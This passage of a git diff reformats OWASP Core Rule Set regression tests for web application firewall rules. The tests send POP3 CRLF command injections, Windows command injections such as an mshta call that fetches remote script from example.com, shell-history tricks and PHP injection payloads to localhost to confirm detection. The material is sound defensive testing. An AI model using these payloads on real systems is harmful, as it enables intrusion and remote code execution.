"/get?attackme=%0d%0aRETR%20123" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 2 desc: "POP3 RETR Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 3 desc: "POP3 DELE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20should%20delete%20nine - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=We%20should%20delete%20nine + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 4 desc: "POP3 LIST Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0alist%203" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0alist%203" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 5 desc: "POP3 LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=This%20text%20is%20a%20way%20of%20list%203%20things - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=This%20text%20is%20a%20way%20of%20list%203%20things + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 6 desc: "POP3 TOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aTOP%201%202" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aTOP%201%202" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 7 desc: "POP3 TOP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=These%20are%20top%10%20rules - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=These%20are%20top%10%20rules + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 8 desc: "POP3 AUTH Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 9 desc: "POP3 AUTH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 10 desc: "POP3 APOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 11 desc: "POP3 APOP Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Look%2C%20apop%20star! - version: HTTP/1.0 - output: - no_log_contains: id "932320" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Look%2C%20apop%20star! + version: HTTP/1.0 + output: + no_log_contains: id "932320" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml index e8f786a99..d5afc429e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml @@ -2,108 +2,101 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 PL3 Command Injection test cases" - enabled: true - name: 932321.yaml +rule_id: 932321 tests: - - test_title: 932321-1 + - test_id: 1 desc: "POP3 QUIT/STAT/NOOP/RSET/CAPA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932321" - - test_title: 932321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log_contains: id "932321" + - test_id: 2 desc: "POP3 QUIT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Don't%20quit" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Don't%20quit" + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 3 desc: "POP3 CAPA Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=we%20do%20not%20have%20that%20capability - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=we%20do%20not%20have%20that%20capability + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 4 desc: "POP3 STAT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hi%20lestat! - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hi%20lestat! + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 5 desc: "POP3 NOOP Command injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0aSeriously%2C%20noop" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0aSeriously%2C%20noop" + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 6 desc: "POP3 RSET Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Someone%20bought%20this%20nice%20lerset - version: HTTP/1.0 - output: - no_log_contains: id "932321" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Someone%20bought%20this%20nice%20lerset + version: HTTP/1.0 + output: + no_log_contains: id "932321" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml index f3c86c781..5ddf01bf4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml @@ -2,22 +2,20 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932330.yaml +rule_id: 932330 tests: - - test_title: 932330-1 + - test_id: 1 desc: "Unix shell history invocation: relative position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!-1!-2" - version: HTTP/1.0 - output: - log_contains: id "932330" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!-1!-2" + version: HTTP/1.0 + output: + log_contains: id "932330" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml index 4b8b11c2a..c9e823dee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml @@ -2,38 +2,35 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932331.yaml +rule_id: 932331 tests: - - test_title: 932331-1 + - test_id: 1 desc: "Unix shell history invocation: absolute position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!1" - version: HTTP/1.0 - output: - log_contains: id "932331" - - test_title: 932331-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!1" + version: HTTP/1.0 + output: + log_contains: id "932331" + - test_id: 2 desc: "Unix shell history invocation: last command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!!" - version: HTTP/1.0 - output: - log_contains: id "932331" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!!" + version: HTTP/1.0 + output: + log_contains: id "932331" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml index 5b3ca8ddf..7801af2f9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml @@ -2,75 +2,70 @@ meta: author: "airween, Franziska Bühler, azurit" description: "Remote Command Execution: Windows Command Injection test cases" - enabled: true - name: 932370.yaml +rule_id: 932370 tests: - - test_title: 932370-1 + - test_id: 1 desc: "Windows Command Injection true positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" - uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" + uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" + version: HTTP/1.0 + output: + log_contains: id "932370" + - test_id: 2 desc: "Windows Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=regedit " - uri: "/get?cmd=regedit%20" - version: HTTP/1.0 - output: - no_log_contains: id "932370" - - test_title: 932370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=regedit " + uri: "/get?cmd=regedit%20" + version: HTTP/1.0 + output: + no_log_contains: id "932370" + - test_id: 3 desc: "Windows Command Injection - bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; mshta http://example.com" - uri: "/get?cmd=;%20mshta%20http://example.com" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; mshta http://example.com" + uri: "/get?cmd=;%20mshta%20http://example.com" + version: HTTP/1.0 + output: + log_contains: id "932370" + - test_id: 4 desc: Windows Command Injection bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + no_log_contains: id "932370" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml index 5e5f82e1b..322c01ee4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml @@ -2,175 +2,165 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: Windows shell command injections - enabled: true - name: 932380.yaml +rule_id: 932380 tests: - - test_title: 932380-1 + - test_id: 1 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot < file.txt Match input redirection to bcdboot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 2 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with normal argument stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 3 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot/r file.txt Match bcdboot with argument without preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 4 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with argument with multiple preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 5 desc: | Windows shell command injection with 'sort' (false positive): sort%3Dex%26sort%3Dascending Do not match query parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" + version: HTTP/1.0 + output: + no_log_contains: id "932380" + - test_id: 6 desc: | Windows shell command injection with 'sort' (false positive): sort%3D0 Do not match encoded path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" + version: HTTP/1.0 + output: + no_log_contains: id "932380" + - test_id: 7 desc: "Windows shell command injection using 'bcdboot'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 8 desc: False positive against 'time warner' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: "id \"932380\"" - - test_title: 932380-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + no_log_contains: "id \"932380\"" + - test_id: 9 desc: False positive against 'time for' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - data: | - payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. - output: - no_log_contains: "id \"932380\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: | + payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. + output: + no_log_contains: "id \"932380\"" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index c586dec53..edc0a1e83 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -2,150 +2,140 @@ meta: author: "csanders-git, Franziska Bühler, azurit" description: None - enabled: true - name: 933100.yaml tests: - - test_title: 933100-1 + - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo= + - ------WebKitFormBoundaryoRWIb3busvBrbttO-- - version: HTTP/1.1 - output: - log_contains: id "933111" + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log_contains: id "933111" diff --git 